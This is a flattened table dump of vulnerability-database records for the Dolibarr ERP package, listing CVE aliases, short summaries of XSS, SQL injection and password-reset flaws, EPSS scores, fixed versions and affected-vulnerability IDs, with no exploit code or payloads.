VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.1 |
|
|
| aliases |
CVE-2021-37517, GHSA-xw7v-qrhc-jjg2
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-yn53-kazm-1ugc |
|
| 60 |
| url |
VCID-yumf-hmep-eqd6 |
| vulnerability_id |
VCID-yumf-hmep-eqd6 |
| summary |
Cross-site Scripting
Dolibarr is vulnerable to XSS. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2020-13094 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.01707 |
| scoring_system |
epss |
| scoring_elements |
0.82687 |
| published_at |
2026-06-07T12:55:00Z |
|
| 1 |
| value |
0.01707 |
| scoring_system |
epss |
| scoring_elements |
0.82688 |
| published_at |
2026-06-06T12:55:00Z |
|
| 2 |
| value |
0.01707 |
| scoring_system |
epss |
| scoring_elements |
0.8269 |
| published_at |
2026-06-05T12:55:00Z |
|
| 3 |
| value |
0.01707 |
| scoring_system |
epss |
| scoring_elements |
0.82663 |
| published_at |
2026-06-04T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2020-13094 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@11.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@11.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-1xw6-g5jg-9bhq |
|
| 3 |
| vulnerability |
VCID-2avs-48u9-5kgf |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 6 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 7 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 8 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 9 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 10 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 15 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 16 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 17 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 18 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 19 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 20 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 21 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 22 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 23 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 24 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 25 |
| vulnerability |
VCID-m588-hqxv-tkgw |
|
| 26 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 27 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 28 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 29 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 30 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 31 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 32 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 33 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 34 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 35 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 36 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 37 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 38 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 39 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 40 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 41 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4 |
|
|
| aliases |
CVE-2020-13094, GHSA-cxvr-r92m-q9hw
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-yumf-hmep-eqd6 |
|
| 61 |
| url |
VCID-yup5-ztvt-cfgp |
| vulnerability_id |
VCID-yup5-ztvt-cfgp |
| summary |
Weak Password Recovery Mechanism for Forgotten Password
Dolibarr is vulnerable to account takeover via password reset functionality. A low privileged attacker can reset the password of any user in the application using the password reset link the user received through email when requested for a forgotten password. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25957 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.5586 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.55909 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.55922 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.55916 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25957 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@13.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@13.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 9 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 10 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 11 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 12 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 13 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 14 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 15 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 16 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 17 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 18 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 19 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 20 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 21 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 22 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 23 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 24 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 25 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 26 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 27 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 28 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 29 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 30 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 31 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 32 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 33 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 7 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 8 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 9 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 10 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 11 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 12 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 13 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 14 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 15 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 16 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 17 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 18 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 19 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 20 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 21 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 22 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 23 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 24 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 25 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 26 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 27 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 28 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 29 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 30 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 31 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 32 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0 |
|
|
| aliases |
CVE-2021-25957, GHSA-c32w-3cqh-f6jx
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-yup5-ztvt-cfgp |
|
| 62 |
| url |
VCID-z1ty-xypd-t3ct |
| vulnerability_id |
VCID-z1ty-xypd-t3ct |
| summary |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
dolibarr is vulnerable to Improper Neutralization of Special Elements used in an SQL Command |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0224 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00515 |
| scoring_system |
epss |
| scoring_elements |
0.67021 |
| published_at |
2026-06-06T12:55:00Z |
|
| 1 |
| value |
0.00515 |
| scoring_system |
epss |
| scoring_elements |
0.67005 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00515 |
| scoring_system |
epss |
| scoring_elements |
0.66972 |
| published_at |
2026-06-04T12:55:00Z |
|
| 3 |
| value |
0.00515 |
| scoring_system |
epss |
| scoring_elements |
0.67012 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0224 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 3 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 4 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 5 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 6 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 7 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 8 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 9 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 10 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 11 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 12 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 13 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 14 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 15 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 16 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 17 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 18 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 19 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 20 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 21 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 22 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 23 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 24 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 25 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0 |
|
|
| aliases |
CVE-2022-0224, GHSA-j545-frh3-r9gq
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-z1ty-xypd-t3ct |
|
| 63 |
| url |
VCID-zjqj-1zrx-yqh6 |
| vulnerability_id |
VCID-zjqj-1zrx-yqh6 |
| summary |
Cross-site Scripting
Dolibarr is affected by stored Cross-Site Scripting. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2017-18259 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40005 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40061 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40089 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40087 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2017-18259 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 26 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 27 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 28 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 29 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 30 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 31 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 32 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 33 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 34 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 35 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 36 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 37 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 38 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 39 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 40 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 41 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 42 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 43 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 44 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 45 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 46 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 47 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 48 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 49 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 50 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 51 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 52 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 53 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 54 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 55 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1 |
|
|
| aliases |
CVE-2017-18259, GHSA-4323-cfj5-98mh
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-zjqj-1zrx-yqh6 |
|